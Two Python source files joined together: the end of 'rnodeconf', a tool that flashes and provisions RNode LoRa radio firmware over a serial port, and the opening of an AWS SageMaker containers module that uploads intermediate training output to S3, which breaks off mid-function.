Ethereum : "+eth_addr) print(" Bitcoin : "+btc_addr) print(" Monero : "+xmr_addr) print(" Ko-Fi : https://ko-fi.com/markqvist") print("") print(" Info : https://unsigned.io/") print(" Code : https://github.com/markqvist") if args.version: print("rnodeconf "+program_version) exit(0) if args.public or args.key or args.flash or args.rom or args.autoinstall: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.serialization import load_der_public_key from cryptography.hazmat.primitives.serialization import load_der_private_key from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives.asymmetric import padding if args.autoinstall: print("\nHello!\n\nThis guide will help you install the RNode firmware on supported") print("and homebrew devices. Please connect the device you wish to set\nup now. Hit enter when it is connected.") input() global squashvw squashvw = True selected_port = None if not args.port: ports = list_ports.comports() portlist = [] for port in ports: portlist.insert(0, port) pi = 1 print("Detected serial ports:") for port in portlist: print(" ["+str(pi)+"] "+str(port.device)+" ("+str(port.product)+", "+str(port.serial_number)+")") pi += 1 print("\nWhat serial port is your device connected to? ", end="") try: c_port = int(input()) if c_port < 1 or c_port > len(ports): raise ValueError() selected_port = portlist[c_port-1] except Exception as e: print("That port does not exist, exiting now.") exit() if selected_port == None: print("Could not select port, exiting now.") exit() port_path = selected_port.device port_product = selected_port.product port_serialno = selected_port.serial_number print("\nOk, using device on "+str(port_path)+" ("+str(port_product)+", "+str(port_serialno)+")") else: ports = list_ports.comports() for port in ports: if port.device == args.port: selected_port = port if selected_port == None: print("Could not find specified port "+str(args.port)+", exiting now") exit() port_path = selected_port.device port_product = selected_port.product port_serialno = selected_port.serial_number print("\nUsing device on "+str(port_path)) print("\nProbing device...") try: rnode_serial = rnode_open_serial(port_path) except Exception as e: RNS.log("Could not open the specified serial port. The contained exception was:") RNS.log(str(e)) exit() rnode = RNode(rnode_serial) thread = threading.Thread(target=rnode.readLoop) thread.setDaemon(True) thread.start() try: rnode.device_probe() except Exception as e: RNS.log("No answer from device") if rnode.detected: RNS.log("Trying to read EEPROM...") rnode.download_eeprom() if rnode.provisioned and rnode.signature_valid: print("\nThis device is already installed and provisioned. No further action will") print("be taken. If you wish to completely reinstall this device, you must first") print("wipe the current EEPROM. See the help for more info.\n\nExiting now.") exit() if rnode.detected: print("\nThe device seems to have an RNode firmware installed, but it was not") print("provisioned correctly, or it is corrupt. We are going to reinstall the") print("correct firmware and provision it.") else: print("\nIt looks like this is a fresh device with no RNode firmware.") print("What kind of device is this?\n") print("[1] Original RNode") print("[2] Homebrew RNode") print("[3] LilyGO T-Beam") print("[4] LilyGO LoRa32 v2.0") print("[5] LilyGO LoRa32 v2.1") print("\n? ", end="") selected_product = None try: c_dev = int(input()) if c_dev < 1 or c_dev > 5: raise ValueError() elif c_dev == 1: selected_product = ROM.PRODUCT_RNODE elif c_dev == 2: selected_product = ROM.PRODUCT_HMBRW print("") print("---------------------------------------------------------------------------") print("Important! Using RNode firmware on homebrew devices should currently be") print("considered experimental. It is not intended for production or critical use.") print("The currently supplied firmware is provided AS-IS as a courtesey to those") print("who would like to experiment with it. If you want any degree of reliability,") print("please use an actual RNode from unsigned.io. Hit enter to continue.") print("---------------------------------------------------------------------------") input() elif c_dev == 3: selected_product = ROM.PRODUCT_TBEAM print("") print("---------------------------------------------------------------------------") print("Important! Using RNode firmware on T-Beam devices should currently be") print("considered experimental. It is not intended for production or critical use.") print("The currently supplied firmware is provided AS-IS as a courtesey to those") print("who would like to experiment with it. If you want any degree of reliability,") print("please use an actual RNode from unsigned.io. Hit enter to continue.") print("---------------------------------------------------------------------------") input() elif c_dev == 4: selected_product = ROM.PRODUCT_T32_20 print("") print("---------------------------------------------------------------------------") print("Important! Using RNode firmware on LoRa32 devices should currently be") print("considered experimental. It is not intended for production or critical use.") print("The currently supplied firmware is provided AS-IS as a courtesey to those") print("who would like to experiment with it. If you want any degree of reliability,") print("please use an actual RNode from unsigned.io. Hit enter to continue.") print("---------------------------------------------------------------------------") input() elif c_dev == 5: selected_product = ROM.PRODUCT_T32_21 print("") print("---------------------------------------------------------------------------") print("Important! Using RNode firmware on LoRa32 devices should currently be") print("considered experimental. It is not intended for production or critical use.") print("The currently supplied firmware is provided AS-IS as a courtesey to those") print("who would like to experiment with it. If you want any degree of reliability,") print("please use an actual RNode from unsigned.io. Hit enter to continue.") print("---------------------------------------------------------------------------") input() except Exception as e: print("That device type does not exist, exiting now.") exit() selected_platform = None selected_model = None selected_mcu = None if selected_product == ROM.PRODUCT_HMBRW: selected_model = ROM.MODEL_FF print("\nWhat kind of microcontroller is your board based on?\n") print("[1] AVR ATmega1284P") print("[2] AVR ATmega2560") print("[3] Espressif Systems ESP32") print("\n? ", end="") try: c_mcu = int(input()) if c_mcu < 1 or c_mcu > 3: raise ValueError() elif c_mcu == 1: selected_mcu = ROM.MCU_1284P selected_platform = ROM.PLATFORM_AVR elif c_mcu == 2: selected_mcu = ROM.MCU_2560 selected_platform = ROM.PLATFORM_AVR elif c_mcu == 3: selected_mcu = ROM.MCU_ESP32 selected_platform = ROM.PLATFORM_ESP32 selected_model = ROM.MODEL_FF except Exception as e: print("That MCU type does not exist, exiting now.") exit() elif selected_product == ROM.PRODUCT_RNODE: selected_mcu = ROM.MCU_1284P print("\nWhat model is this RNode?\n") print("[1] RNode 410 - 525 MHz") print("[2] RNode 820 - 1020 MHz") print("\n? ", end="") try: c_model = int(input()) if c_model < 1 or c_model > 2: raise ValueError() elif c_model == 1: selected_model = ROM.MODEL_A4 selected_platform = ROM.PLATFORM_AVR elif c_model == 2: selected_model = ROM.MODEL_A9 selected_platform = ROM.PLATFORM_AVR except Exception as e: print("That model does not exist, exiting now.") exit() elif selected_product == ROM.PRODUCT_TBEAM: selected_mcu = ROM.MCU_ESP32 print("\nWhat band is this T-Beam for?\n") print("[1] 433 MHz") print("[2] 868 MHz") print("[3] 915 MHz") print("[4] 923 MHz") print("\n? ", end="") try: c_model = int(input()) if c_model < 1 or c_model > 4: raise ValueError() elif c_model == 1: selected_model = ROM.MODEL_E4 selected_platform = ROM.PLATFORM_ESP32 elif c_model > 1: selected_model = ROM.MODEL_E9 selected_platform = ROM.PLATFORM_ESP32 except Exception as e: print("That band does not exist, exiting now.") exit() elif selected_product == ROM.PRODUCT_T32_20: selected_mcu = ROM.MCU_ESP32 print("\nWhat band is this LoRa32 for?\n") print("[1] 433 MHz") print("[2] 868 MHz") print("[3] 915 MHz") print("[4] 923 MHz") print("\n? ", end="") try: c_model = int(input()) if c_model < 1 or c_model > 4: raise ValueError() elif c_model == 1: selected_model = ROM.MODEL_B3 selected_platform = ROM.PLATFORM_ESP32 elif c_model > 1: selected_model = ROM.MODEL_B8 selected_platform = ROM.PLATFORM_ESP32 except Exception as e: print("That band does not exist, exiting now.") exit() elif selected_product == ROM.PRODUCT_T32_21: selected_mcu = ROM.MCU_ESP32 print("\nWhat band is this LoRa32 for?\n") print("[1] 433 MHz") print("[2] 868 MHz") print("[3] 915 MHz") print("[4] 923 MHz") print("\n? ", end="") try: c_model = int(input()) if c_model < 1 or c_model > 4: raise ValueError() elif c_model == 1: selected_model = ROM.MODEL_B4 selected_platform = ROM.PLATFORM_ESP32 elif c_model > 1: selected_model = ROM.MODEL_B9 selected_platform = ROM.PLATFORM_ESP32 except Exception as e: print("That band does not exist, exiting now.") exit() if selected_model != ROM.MODEL_FF: fw_filename = models[selected_model][4] else: if selected_platform == ROM.PLATFORM_AVR: if selected_mcu == ROM.MCU_1284P: fw_filename = "rnode_firmware_latest.hex" elif selected_mcu == ROM.MCU_2560: fw_filename = "rnode_firmware_latest_m2560.hex" elif selected_platform == ROM.PLATFORM_ESP32: fw_filename = None print("\nWhat kind of ESP32 board is this?\n") print("[1] Adafruit Feather ESP32 (HUZZAH32)") print("[2] Generic ESP32 board") print("\n? ", end="") try: c_eboard = int(input()) if c_eboard < 1 or c_eboard > 2: raise ValueError() elif c_eboard == 1: fw_filename = "rnode_firmware_latest_featheresp32.zip" elif c_eboard == 2: fw_filename = "rnode_firmware_latest_esp32_generic.zip" except Exception as e: print("That ESP32 board does not exist, exiting now.") exit() if fw_filename == None: print("") print("Sorry, no firmware for your board currently exists.") print("Help making it a reality by contributing code or by") print("donating to the project.") print("") print_donation_block() print("") exit() print("\nOk, that should be all the information we need. Please confirm the following") print("summary before proceeding. In the next step, the device will be flashed and") print("provisioned, so make that you are satisfied with your choices.\n") print("Serial port : "+str(selected_port.device)) print("Device type : "+str(products[selected_product])+" "+str(models[selected_model][3])) print("Platform : "+str(platforms[selected_platform])) print("Device MCU : "+str(mcus[selected_mcu])) print("Firmware file : "+str(fw_filename)) print("\nIs the above correct? [y/N] ", end="") try: c_ok = input().lower() if c_ok != "y": raise ValueError() except Exception as e: print("OK, aborting now.") exit() args.key = True args.port = selected_port.device args.platform = selected_platform args.hwrev = 1 mapped_model = selected_model mapped_product = selected_product args.update = False args.flash = True # TODO: Download firmware file from github here try: RNS.log("Downloading latest frimware from GitHub...") os.makedirs("./update", exist_ok=True) download_firmware(fw_filename) RNS.log("Firmware download completed") except Exception as e: RNS.log("Could not download firmware package") RNS.log("The contained exception was: "+str(e)) exit() rnode.disconnect() if args.public: private_bytes = None try: file = open("./firmware/signing.key", "rb") private_bytes = file.read() file.close() except Exception as e: RNS.log("Could not load signing key") try: private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) RNS.log("Public key:") RNS.log(RNS.hexrep(public_bytes, delimit=False)) except Exception as e: RNS.log("Could not deserialize signing key") RNS.log(str(e)) exit() if args.key: RNS.log("Generating a new signing key...") private_key = rsa.generate_private_key( public_exponent=65537, key_size=1024, backend=default_backend() ) private_bytes = private_key.private_bytes( encoding=serialization.Encoding.DER, format=serialization.PrivateFormat.PKCS8, encryption_algorithm=serialization.NoEncryption() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) os.makedirs("./firmware", exist_ok=True) if os.path.isdir("./firmware"): if os.path.isfile("./firmware/signing.key"): if not args.autoinstall: RNS.log("Signing key already exists, not overwriting!") RNS.log("Manually delete this key to create a new one.") else: file = open("./firmware/signing.key", "wb") file.write(private_bytes) file.close() if not squashvw: RNS.log("Wrote signing key") RNS.log("Public key:") RNS.log(RNS.hexrep(public_bytes, delimit=False)) else: RNS.log("The firmware directory does not exist, can't write key!") if not args.autoinstall: exit() def get_flasher_call(platform, fw_filename): from shutil import which if platform == "unzip": flasher = "unzip" if which(flasher) is not None: return [flasher, "-o", "./update/"+fw_filename, "-d", "./update/"] else: RNS.log("") RNS.log("You do not currently have the \""+flasher+"\" program installed on your system.") RNS.log("Unfortunately, that means we can't proceed, since it is needed to flash your") RNS.log("board. You can install it via your package manager, for example:") RNS.log("") RNS.log(" sudo apt install "+flasher) RNS.log("") RNS.log("Please install \""+flasher+"\" and try again.") exit() elif platform == ROM.PLATFORM_AVR: flasher = "avrdude" if which(flasher) is not None: # avrdude -C/home/markqvist/.arduino15/packages/arduino/tools/avrdude/6.3.0-arduino17/etc/avrdude.conf -q -q -V -patmega2560 -cwiring -P/dev/ttyACM0 -b115200 -D -Uflash:w:/tmp/arduino-sketch-0E260F46C421A84A7CBAD48E859C8E64/RNode_Firmware.ino.hex:i # avrdude -q -q -V -patmega2560 -cwiring -P/dev/ttyACM0 -b115200 -D -Uflash:w:/tmp/arduino-sketch-0E260F46C421A84A7CBAD48E859C8E64/RNode_Firmware.ino.hex:i if fw_filename == "rnode_firmware_latest.hex": return [flasher, "-P", args.port, "-p", "m1284p", "-c", "arduino", "-b", "115200", "-U", "flash:w:update/"+fw_filename+":i"] elif fw_filename == "rnode_firmware_latest_m2560.hex": return [flasher, "-P", args.port, "-p", "atmega2560", "-c", "wiring", "-D", "-b", "115200", "-U", "flash:w:update/"+fw_filename] else: RNS.log("") RNS.log("You do not currently have the \""+flasher+"\" program installed on your system.") RNS.log("Unfortunately, that means we can't proceed, since it is needed to flash your") RNS.log("board. You can install it via your package manager, for example:") RNS.log("") RNS.log(" sudo apt install avrdude") RNS.log("") RNS.log("Please install \""+flasher+"\" and try again.") exit() elif platform == ROM.PLATFORM_ESP32: flasher = "./update/esptool.py" if which(flasher) is not None: if fw_filename == "rnode_firmware_latest_tbeam.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_tbeam.boot_app0", "0x1000", "./update/rnode_firmware_latest_tbeam.bootloader", "0x10000", "./update/rnode_firmware_latest_tbeam.bin", "0x8000", "./update/rnode_firmware_latest_tbeam.partitions", ] elif fw_filename == "rnode_firmware_latest_lora32v20.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_lora32v20.boot_app0", "0x1000", "./update/rnode_firmware_latest_lora32v20.bootloader", "0x10000", "./update/rnode_firmware_latest_lora32v20.bin", "0x8000", "./update/rnode_firmware_latest_lora32v20.partitions", ] elif fw_filename == "rnode_firmware_latest_lora32v21.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_lora32v21.boot_app0", "0x1000", "./update/rnode_firmware_latest_lora32v21.bootloader", "0x10000", "./update/rnode_firmware_latest_lora32v21.bin", "0x8000", "./update/rnode_firmware_latest_lora32v21.partitions", ] elif fw_filename == "rnode_firmware_latest_featheresp32.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_featheresp32.boot_app0", "0x1000", "./update/rnode_firmware_latest_featheresp32.bootloader", "0x10000", "./update/rnode_firmware_latest_featheresp32.bin", "0x8000", "./update/rnode_firmware_latest_featheresp32.partitions", ] elif fw_filename == "rnode_firmware_latest_esp32_generic.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_esp32_generic.boot_app0", "0x1000", "./update/rnode_firmware_latest_esp32_generic.bootloader", "0x10000", "./update/rnode_firmware_latest_esp32_generic.bin", "0x8000", "./update/rnode_firmware_latest_esp32_generic.partitions", ] else: RNS.log("No flasher available for this board, cannot install firmware.") else: RNS.log("") RNS.log("You do not currently have the \""+flasher+"\" program installed on your system.") RNS.log("Unfortunately, that means we can't proceed, since it is needed to flash your") RNS.log("board. You can install it via your package manager, for example:") RNS.log("") RNS.log(" sudo apt install esptool") RNS.log("") RNS.log("Please install \""+flasher+"\" and try again.") exit() if args.port: if args.flash: from subprocess import call if fw_filename == None: fw_filename = "rnode_firmware.hex" if args.platform == None: args.platform = ROM.PLATFORM_AVR if args.autoinstall: fw_src = "./update/" else: import shutil shutil.copy("./firmware/"+fw_filename, "./update/"+fw_filename) fw_src = "./update/" if os.path.isfile(fw_src+fw_filename): try: if fw_filename.endswith(".zip"): RNS.log("Extracting firmware...") unzip_status = call(get_flasher_call("unzip", fw_filename)) if unzip_status == 0: RNS.log("Firmware extracted") else: RNS.log("Could not extract firmware from downloaded zip file") exit() RNS.log("Flashing RNode firmware to device on "+args.port) from subprocess import call flash_status = call(get_flasher_call(args.platform, fw_filename)) if flash_status == 0: RNS.log("Done flashing") args.rom = True if args.platform == ROM.PLATFORM_ESP32: RNS.log("Waiting for ESP32 reset...") time.sleep(5) else: exit() except Exception as e: RNS.log("Error while flashing") RNS.log(str(e)) else: RNS.log("Firmware file not found") exit() RNS.log("Opening serial port "+args.port+"...") try: rnode_port = args.port rnode_serial = rnode_open_serial(rnode_port) except Exception as e: RNS.log("Could not open the specified serial port. The contained exception was:") RNS.log(str(e)) exit() rnode = RNode(rnode_serial) thread = threading.Thread(target=rnode.readLoop) thread.setDaemon(True) thread.start() try: rnode.device_probe() except Exception as e: RNS.log("Serial port opened, but RNode did not respond. Is a valid firmware installed?") print(e) exit() if rnode.detected: if rnode.platform == None or rnode.mcu == None: rnode.platform = ROM.PLATFORM_AVR rnode.mcu = ROM.MCU_1284P if args.eepromwipe: RNS.log("WARNING: EEPROM is being wiped! Power down device NOW if you do not want this!") rnode.wipe_eeprom() exit() RNS.log("Reading EEPROM...") rnode.download_eeprom() if rnode.provisioned: if rnode.model != ROM.MODEL_FF: fw_filename = models[rnode.model][4] else: if rnode.platform == ROM.PLATFORM_AVR: if rnode.mcu == ROM.MCU_1284P: fw_filename = "rnode_firmware_latest.hex" elif rnode.mcu == ROM.MCU_2560: fw_filename = "rnode_firmware_latest_m2560.hex" elif rnode.platform == ROM.PLATFORM_ESP32: if rnode.board == ROM.BOARD_HUZZAH32: fw_filename = "rnode_firmware_latest_featheresp32.zip" elif rnode.board == ROM.BOARD_GENERIC_ESP32: fw_filename = "rnode_firmware_latest_esp32_generic.zip" else: fw_filename = None if args.update: RNS.log("ERROR: No firmware found for this board. Cannot update.") exit() if args.update: rnode.disconnect() from subprocess import call if not args.nocheck: try: RNS.log("Downloading latest firmware from GitHub...") os.makedirs("./update", exist_ok=True) download_firmware(fw_filename) RNS.log("Firmware download completed") if fw_filename.endswith(".zip"): RNS.log("Extracting firmware...") unzip_status = call(get_flasher_call("unzip", fw_filename)) if unzip_status == 0: RNS.log("Firmware extracted") else: RNS.log("Could not extract firmware from downloaded zip file") exit() except Exception as e: RNS.log("Could not download firmware update") RNS.log("The contained exception was: "+str(e)) exit() else: RNS.log("Skipping online check, using local firmware file: "+"./update/"+fw_filename) if os.path.isfile("./update/"+fw_filename): try: args.info = False RNS.log("Updating RNode firmware for device on "+args.port) flash_status = call(get_flasher_call(rnode.platform, fw_filename)) if flash_status == 0: RNS.log("Flashing new firmware completed") RNS.log("Opening serial port "+args.port+"...") try: rnode_port = args.port rnode_serial = rnode_open_serial(rnode_port) except Exception as e: RNS.log("Could not open the specified serial port. The contained exception was:") RNS.log(str(e)) exit() rnode = RNode(rnode_serial) thread = threading.Thread(target=rnode.readLoop) thread.setDaemon(True) thread.start() try: rnode.device_probe() except Exception as e: RNS.log("Serial port opened, but RNode did not respond. Is a valid firmware installed?") print(e) exit() if rnode.detected: if rnode.platform == None or rnode.mcu == None: rnode.platform = ROM.PLATFORM_AVR rnode.mcu = ROM.MCU_1284P RNS.log("Reading EEPROM...") rnode.download_eeprom() if rnode.provisioned: if rnode.model != ROM.MODEL_FF: fw_filename = models[rnode.model][4] else: fw_filename = None args.info = True if args.info: RNS.log("") RNS.log("Firmware update completed successfully") else: RNS.log("An error occurred while flashing the new firmware, exiting now.") exit() except Exception as e: RNS.log("Error while updating firmware") RNS.log(str(e)) else: RNS.log("Firmware update file not found") exit() if args.dump: RNS.log("EEPROM contents:") RNS.log(RNS.hexrep(rnode.eeprom)) exit() if args.backup: try: timestamp = time.time() filename = str(time.strftime("%Y-%m-%d_%H-%M-%S")) path = "./eeprom/"+filename+".eeprom" file = open(path, "wb") file.write(rnode.eeprom) file.close() RNS.log("EEPROM backup written to: "+path) except Exception as e: RNS.log("EEPROM was successfully downloaded from device,") RNS.log("but file could not be written to disk.") exit() if args.info: if rnode.provisioned: timestamp = struct.unpack(">I", rnode.made)[0] timestring = datetime.datetime.fromtimestamp(timestamp).strftime("%Y-%m-%d %H:%M:%S") sigstring = "Unverified" if rnode.signature_valid: if rnode.locally_signed: sigstring = "Validated - Local signature" else: sigstring = "Genuine board, vendor is "+rnode.vendor if rnode.board != None: board_string = ":"+bytes([rnode.board]).hex() else: board_string = "" RNS.log("") RNS.log("Device info:") RNS.log("\tProduct : "+products[rnode.product]+" "+models[rnode.model][3]+" ("+bytes([rnode.product]).hex()+":"+bytes([rnode.model]).hex()+board_string+")") RNS.log("\tDevice signature : "+sigstring) RNS.log("\tFirmware version : "+rnode.version) RNS.log("\tHardware revision : "+str(int(rnode.hw_rev))) RNS.log("\tSerial number : "+RNS.hexrep(rnode.serialno)) RNS.log("\tFrequency range : "+str(rnode.min_freq/1e6)+" MHz - "+str(rnode.max_freq/1e6)+" MHz") RNS.log("\tMax TX power : "+str(rnode.max_output)+" dBm") RNS.log("\tManufactured : "+timestring) if rnode.configured: rnode.bandwidth = rnode.conf_bandwidth rnode.r_bandwidth = rnode.conf_bandwidth rnode.sf = rnode.conf_sf rnode.r_sf = rnode.conf_sf rnode.cr = rnode.conf_cr rnode.r_cr = rnode.conf_cr rnode.updateBitrate() txp_mw = round(pow(10, (rnode.conf_txpower/10)), 3) RNS.log(""); RNS.log("\tDevice mode : TNC") RNS.log("\t Frequency : "+str((rnode.conf_frequency/1000000.0))+" MHz") RNS.log("\t Bandwidth : "+str(rnode.conf_bandwidth/1000.0)+" KHz") RNS.log("\t TX power : "+str(rnode.conf_txpower)+" dBm ("+str(txp_mw)+" mW)") RNS.log("\t Spreading factor : "+str(rnode.conf_sf)) RNS.log("\t Coding rate : "+str(rnode.conf_cr)) RNS.log("\t On-air bitrate : "+str(rnode.bitrate_kbps)+" kbps") else: RNS.log("\tDevice mode : Normal (host-controlled)") print("") exit() else: RNS.log("EEPROM is invalid, no further information available") exit() if args.rom: if rnode.provisioned and not args.autoinstall: RNS.log("EEPROM bootstrap was requested, but a valid EEPROM was already present.") RNS.log("No changes are being made.") exit() else: if rnode.signature_valid: RNS.log("EEPROM bootstrap was requested, but a valid EEPROM was already present.") RNS.log("No changes are being made.") exit() else: if args.autoinstall: RNS.log("Clearing old EEPROM, this will take about 15 seconds...") rnode.wipe_eeprom() if rnode.platform == ROM.PLATFORM_ESP32: RNS.log("Waiting for ESP32 reset...") time.sleep(6) else: time.sleep(3) os.makedirs("./firmware", exist_ok=True) counter = None counter_path = "./firmware/serial.counter" try: if os.path.isfile(counter_path): file = open(counter_path, "r") counter_str = file.read() counter = int(counter_str) file.close() else: counter = 0 except Exception as e: RNS.log("Could not create device serial number, exiting") RNS.log(str(e)) exit() serialno = counter+1 model = None hwrev = None if args.product != None: if args.product == "03": mapped_product = ROM.PRODUCT_RNODE if args.product == "f0": mapped_product = ROM.PRODUCT_HMBRW if args.product == "e0": mapped_product = ROM.PRODUCT_TBEAM if mapped_model != None: model = mapped_model else: if args.model == "a4": model = ROM.MODEL_A4 elif args.model == "a9": model = ROM.MODEL_A9 # TODO: Remove, no more homebrew model differentiation # elif args.model == "f4": # model = ROM.MODEL_F4 # elif args.model == "f9": # model = ROM.MODEL_F9 elif args.model == "e4": model = ROM.MODEL_E4 elif args.model == "e9": model = ROM.MODEL_E9 elif args.model == "ff": model = ROM.MODEL_FF if args.hwrev != None and (args.hwrev > 0 and args.hwrev < 256): hwrev = chr(args.hwrev) if serialno > 0 and model != None and hwrev != None: try: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend timestamp = int(time.time()) time_bytes = struct.pack(">I", timestamp) serial_bytes = struct.pack(">I", serialno) file = open(counter_path, "w") file.write(str(serialno)) file.close() info_chunk = b"" + bytes([mapped_product, model, ord(hwrev)]) info_chunk += serial_bytes info_chunk += time_bytes digest = hashes.Hash(hashes.MD5(), backend=default_backend()) digest.update(info_chunk) checksum = digest.finalize() RNS.log("Loading signing key...") signature = None key_path = "./firmware/signing.key" if os.path.isfile(key_path): try: file = open(key_path, "rb") private_bytes = file.read() file.close() private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) signature = private_key.sign( checksum, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH ), hashes.SHA256() ) except Exception as e: RNS.log("Error while signing EEPROM") RNS.log(str(e)) else: RNS.log("No signing key found") exit() RNS.log("Bootstrapping device EEPROM...") rnode.hard_reset() rnode.write_eeprom(ROM.ADDR_PRODUCT, mapped_product) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MODEL, model) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_HW_REV, ord(hwrev)) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL, serial_bytes[0]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+1, serial_bytes[1]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+2, serial_bytes[2]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+3, serial_bytes[3]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE, time_bytes[0]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+1, time_bytes[1]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+2, time_bytes[2]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+3, time_bytes[3]) time.sleep(0.006) for i in range(0,16): rnode.write_eeprom(ROM.ADDR_CHKSUM+i, checksum[i]) time.sleep(0.006) for i in range(0,128): rnode.write_eeprom(ROM.ADDR_SIGNATURE+i, signature[i]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_INFO_LOCK, ROM.INFO_LOCK_BYTE) RNS.log("EEPROM written! Validating...") if rnode.platform == ROM.PLATFORM_ESP32: RNS.log("Waiting for ESP32 reset...") time.sleep(5) rnode.download_eeprom() if rnode.provisioned: RNS.log("EEPROM Bootstrapping successful!") rnode.hard_reset() if args.autoinstall: print("") print("RNode Firmware autoinstallation complete!") print("") print("To use your device with Reticulum, read the documetation at:") print("") print("https://markqvist.github.io/Reticulum/manual/gettingstartedfast.html") print("") print("Thank you for using this utility! Please help the project by") print("contributing code and reporting bugs, or by donating!") print("") print("Your contributions and donations directly further the realisation") print("of truly open, free and resilient communications systems.") print("") print_donation_block() print("") try: os.makedirs("./firmware/device_db/", exist_ok=True) file = open("./firmware/device_db/"+serial_bytes.hex(), "wb") written = file.write(rnode.eeprom) file.close() except Exception as e: RNS.log("WARNING: Could not backup device EEPROM to disk") exit() else: RNS.log("EEPROM was written, but validation failed. Check your settings.") exit() except Exception as e: RNS.log("An error occurred while writing EEPROM. The contained exception was:") RNS.log(str(e)) raise e else: RNS.log("Invalid data specified, cancelling EEPROM write") exit() if rnode.provisioned: if args.normal: rnode.setNormalMode() RNS.log("Device set to normal (host-controlled) operating mode") exit() if args.tnc: if not (args.freq and args.bw and args.txp and args.sf and args.cr): RNS.log("Please input startup configuration:") print("") if args.freq: rnode.frequency = args.freq else: print("Frequency in Hz:\t", end="") rnode.frequency = int(input()) if args.bw: rnode.bandwidth = args.bw else: print("Bandwidth in Hz:\t", end="") rnode.bandwidth = int(input()) if args.txp != None and (args.txp >= 0 and args.txp <= 17): rnode.txpower = args.txp else: print("TX Power in dBm:\t", end="") rnode.txpower = int(input()) if args.sf: rnode.sf = args.sf else: print("Spreading factor:\t", end="") rnode.sf = int(input()) if args.cr: rnode.cr = args.cr else: print("Coding rate:\t\t", end="") rnode.cr = int(input()) print("") rnode.initRadio() sleep(0.5) rnode.setTNCMode() RNS.log("Device set to TNC operating mode") sleep(1.0) exit() else: RNS.log("This device contains a valid firmware, but EEPROM is invalid.") RNS.log("Probably the device has not been initialised, or the EEPROM has been erased.") RNS.log("Please correctly initialise the device and try again!") else: print("") parser.print_help() print("") exit() except KeyboardInterrupt: print("") exit() if __name__ == "__main__": main()
_intermediate_output.py
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. from __future__ import absolute_import import concurrent.futures as futures import multiprocessing import os import shutil import time import boto3 import boto3.s3.transfer as s3transfer import inotify_simple from six.moves.urllib.parse import urlparse from sagemaker_containers import _env, _logging logger = _logging.get_logger() intermediate_path = _env.output_intermediate_dir # type: str failure_file_path = os.path.join(_env.output_dir, 'failure') # type: str success_file_path = os.path.join(_env.output_dir, 'success') # type: str tmp_dir_path = os.path.join(intermediate_path, '.tmp.sagemaker_s3_sync') # type: str def _timestamp(): """Return a timestamp with microsecond precision.""" moment = time.time() moment_us = repr(moment).split('.')[1] return time.strftime("%Y-%m-%d-%H-%M-%S-{}".format(moment_us), time.gmtime(moment)) def _upload_to_s3(s3_uploader, relative_path, file_path, filename): try: key = os.path.join(s3_uploader['key_prefix'], relative_path, filename) s3_uploader['transfer'].upload_file(file_path, s3_uploader['bucket'], key) except FileNotFoundError: # Broken link or deleted pass except Exception: logger.exception('Failed to upload file to s3.') finally: # delete the original file if os.path.exists(file_path): os.remove(file_path) def _copy_file(executor, s3_uploader, relative_path, filename): try: src = os.path.join(intermediate_path, relative_path, filename) dst = os.path.join(tmp_dir_path, relative_path, '{}.{}'.format(_timestamp(), filename)) shutil.copy2(src, dst) executor.submit(_upload_to_s3, s3_uploader, relative_path, dst, filename) except FileNotFoundError: # Broken link or deleted pass except Exception: logger.exception('Failed to copy file to the temporarily directory.') def _watch(inotify, watchers, watch_flags, 